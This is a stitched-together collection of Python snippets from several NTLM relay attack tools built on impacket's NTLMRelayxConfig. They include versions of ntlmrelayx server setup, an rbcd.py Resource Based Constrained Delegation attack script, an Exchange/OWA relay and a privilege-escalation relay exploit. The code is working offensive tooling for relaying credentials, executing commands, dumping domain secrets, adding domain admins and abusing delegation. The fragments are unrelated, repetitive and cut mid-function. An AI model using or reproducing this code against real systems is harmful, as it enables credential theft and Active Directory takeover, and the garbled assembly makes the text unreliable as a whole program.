def __init__(self): NTLMRelayxConfig.__init__(self) # Auth options self.dcip = None self.aeskey = None self.hashes = None self.password = None self.israwpassword = False self.salt = None # Krb options self.format = 'ccache' # LDAP options self.dumpdomain = True self.addda = True self.aclattack = True self.validateprivs = True self.escalateuser = None self.addcomputer = False self.delegateaccess = False # Custom options self.victim = None
def __init__(self): NTLMRelayxConfig.__init__(self) # Auth options self.dcip = None self.aeskey = None self.hashes = None self.password = None self.israwpassword = False self.salt = None # Krb options self.format = 'ccache'
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.escalate_user) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
logging.info("Running HTTP server in redirect mode") if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) watchthread.start() if options.socks is True: # Start a SOCKS proxy in the background s = SOCKS() socks_thread = Thread(target=s.serve_forever) socks_thread.daemon = True socks_thread.start() for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setRunSocks(options.socks) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEncoding(codec) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump,options.no_da) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setDisableMulti(options.no_multirelay) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid) c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setSMBChallenge(options.ntlmchallenge) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) c.setWebDAVOptions(options.serve_image) c.setIsADCSAttack(options.adcs) c.setADCSOptions(options.template) c.setIsShadowCredentialsAttack(options.shadow_credentials) c.setShadowCredentialsOptions(options.shadow_target, options.pfx_password, options.export_type, options.cert_outfile_path) c.setAltName(options.altname) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB if server is not SMBRelayServer and options.random: c.setRandomTargets(True) if server is HTTPRelayServer: c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain) for port in options.http_port: c.setListeningPort(port) s = server(c) s.start() threads.add(s) sleep(0.1) continue elif server is SMBRelayServer: c.setListeningPort(options.smb_port) elif server is WCFRelayServer: c.setListeningPort(options.wcf_port) elif server is RAWRelayServer: c.setListeningPort(options.raw_port) s = server(c) s.start() threads.add(s) return c
import ldap3 import ldapdomaindump from impacket import logging from impacket.examples import logger from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig attackeraccount = ('DOMAIN\\USER', 'PASSWORD') fakecomputer = 'FAKE_COMPUTER_NAME' targetcomputer = 'TARGET_COMPUTER_NAME' dc = 'DC_IP' targetsam = '{}$'.format(targetcomputer) fakecomputersam = '{}$'.format(fakecomputer) c = NTLMRelayxConfig() c.addcomputer = fakecomputer c.target = dc logger.init() logging.getLogger().setLevel(logging.INFO) logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam)) logging.info('Initializing LDAP connection to {}'.format(dc)) #tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2) serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL) logging.info('Using {} account with password ***'.format(attackeraccount[0])) conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE) conn.bind() logging.info('LDAP bind OK')
action='store', help= 'domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)' ) if len(sys.argv) == 1: parser.print_help() print( '\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020' ) sys.exit(1) options = parser.parse_args() attackeraccount = options.identity.split(':') c = NTLMRelayxConfig() c.addcomputer = options.f c.target = options.dc_ip if options.hashes: # support only :NTHASH format (no LM) attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" + options.hashes.split(":")[1]).upper() else: attackerpassword = attackeraccount[1] logger.init() logging.getLogger().setLevel(logging.INFO) logging.info( 'Starting Resource Based Constrained Delegation Attack against {}$'.format( options.t))
def startServers(targetURL, interface, hashOutputFile=None, serverIP="127.0.0.1", serverPort=8000): PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = (SMBRelayServer, HTTPRelayServer) serverThreads = [] C_Attack = {"HTTPS": ExchangePlugin} for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients({"HTTPS": HTTPSRelayClient}) c.setTargets(TargetsProcessor(singleTarget=str(targetURL + "/"))) c.setOutputFile(hashOutputFile) c.setMode('RELAY') c.setAttacks(C_Attack) c.setInterfaceIp(interface) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started") # Now start the WebUI on 127.0.0.1:8000 owa = Thread(target=OWAServer.runServer, args=( serverIP, serverPort, PoppedDB, PoppedDB_Lock, )) owa.daemon = True owa.start() try: while owa.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown()
watchthread.start() threads = set() socksServer = None if options.socks is True: # Start a SOCKS proxy in the background socksServer = SOCKS() socksServer.daemon_threads = True socks_thread = Thread(target=socksServer.serve_forever) socks_thread.daemon = True socks_thread.start() threads.add(socks_thread) for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEncoding(codec) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
#print targetSystem.targets if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) watchthread.start() if options.lootdir is not None: lootdir = options.lootdir else: lootdir = '.' exeFile = options.e Command = options.c for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setTargets(targetSystem) c.setExeFile(exeFile) c.setCommand(Command) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r)
watchthread.start() if options.lootdir is not None: lootdir = options.lootdir else: lootdir = '.' #Temp #mode = 'TRANSPARENT' exeFile = options.e Command = options.c for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setTargets(targetSystem) c.setExeFile(exeFile) c.setCommand(Command) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(lootdir) c.setOutputFile(options.output_file) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None: c.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
def startServers(passargs): targetSystem = passargs.target_host privuser = passargs.user PoppedDB = Manager().dict() # A dict of PoppedUsers PoppedDB_Lock = Lock() # A lock for opening the dict relayServers = (SMBRelayServer, HTTPRelayServer) serverThreads = [] for server in relayServers: c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setTargets( TargetsProcessor(singleTarget=str("ldap://" + targetSystem), protocolClients=PROTOCOL_CLIENTS)) c.setOutputFile(None) c.setEncoding('ascii') c.setMode('RELAY') c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir('.') c.setInterfaceIp("0.0.0.0") c.setLDAPOptions(True, True, True, privuser) c.PoppedDB = PoppedDB # pass the poppedDB to the relay servers c.PoppedDB_Lock = PoppedDB_Lock # pass the poppedDB to the relay servers s = server(c) s.start() serverThreads.append(s) logging.info("Relay servers started, waiting for connection....") status = exploit(passargs) if status: exp = Thread(target=gethash, args=(passargs, )) exp.daemon = True exp.start() try: while exp.isAlive(): pass except KeyboardInterrupt, e: logging.info("Shutting down...") for thread in serverThreads: thread.server.shutdown()
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.sid) c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) c.setExploitOptions(options.remove_mic, options.remove_target) c.setWebDAVOptions(options.serve_image) c.setNamedPipeOptions(options.np_name, options.np_payload, options.np_pid) if server is HTTPRelayServer: c.setListeningPort(options.http_port) c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
def start_servers(options, threads): for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(options.socks, socksServer) c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setEnumLocalAdmins(options.enum_local_admins) c.setEncoding(codec) c.setMode(mode) c.setAttacks(PROTOCOL_ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) c.setIPv6(options.ipv6) c.setWpadOptions(options.wpad_host, options.wpad_auth_num) c.setSMB2Support(options.smb2support) c.setInterfaceIp(options.interface_ip) if server is HTTPRelayServer: c.setListeningPort(options.http_port) elif server is SMBRelayServer: c.setListeningPort(options.smb_port) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) #Use target randomization if configured and the server is not SMB #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues if server is not SMBRelayServer and options.random: c.setRandomTargets(True) s = server(c) s.start() threads.add(s) return c
watchthread.start() if options.lootdir is not None: lootdir = options.lootdir else: lootdir = '.' #Temp #mode = 'TRANSPARENT' exeFile = options.e Command = options.c for server in RELAY_SERVERS: #Set up config c = NTLMRelayxConfig() c.setTargets(targetSystem) c.setExeFile(exeFile) c.setCommand(Command) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(lootdir) c.setOutputFile(options.output_file) #If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode('REDIRECT') c.setRedirectHost(options.r) if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None: c.setDomainAccount(options.machine_account, options.machine_hashes,
logger.init() print 'ridrelay v0.2 - Get domain usernames by relaying low priv creds!\n' logging.getLogger().setLevel(logging.INFO) logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) codec = sys.getdefaultencoding() targetSystem = TargetsProcessor(singleTarget=args.target, protocolClients=PROTOCOL_CLIENTS) threads = set() for server in RELAY_SERVERS: # Set up config c = NTLMRelayxConfig() c.setProtocolClients(PROTOCOL_CLIENTS) c.setRunSocks(False, None) c.setTargets(targetSystem) c.setEncoding(codec) c.setAttacks(ATTACKS) c.setOutputFile(args.out_file) c.setSMB2Support(True) c.setInterfaceIp('') if server == HTTPRelayServer: c.setMode('REFLECTION') else: c.setMode('REDIRECT') c.setRedirectHost(True) s = server(c)
mode = "RELAY" else: logging.info("Running in reflection mode") targetSystem = None mode = "REFLECTION" if options.r is not None: logging.info("Running HTTP server in redirect mode") if targetSystem is not None and options.w: watchthread = TargetsFileWatcher(targetSystem) watchthread.start() for server in RELAY_SERVERS: # Set up config c = NTLMRelayxConfig() c.setTargets(targetSystem) c.setExeFile(options.e) c.setCommand(options.c) c.setMode(mode) c.setAttacks(ATTACKS) c.setLootdir(options.lootdir) c.setOutputFile(options.output_file) c.setLDAPOptions(options.no_dump, options.no_da) c.setMSSQLOptions(options.query) c.setInteractive(options.interactive) c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max) # If the redirect option is set, configure the HTTP server to redirect targets to SMB if server is HTTPRelayServer and options.r is not None: c.setMode("REDIRECT")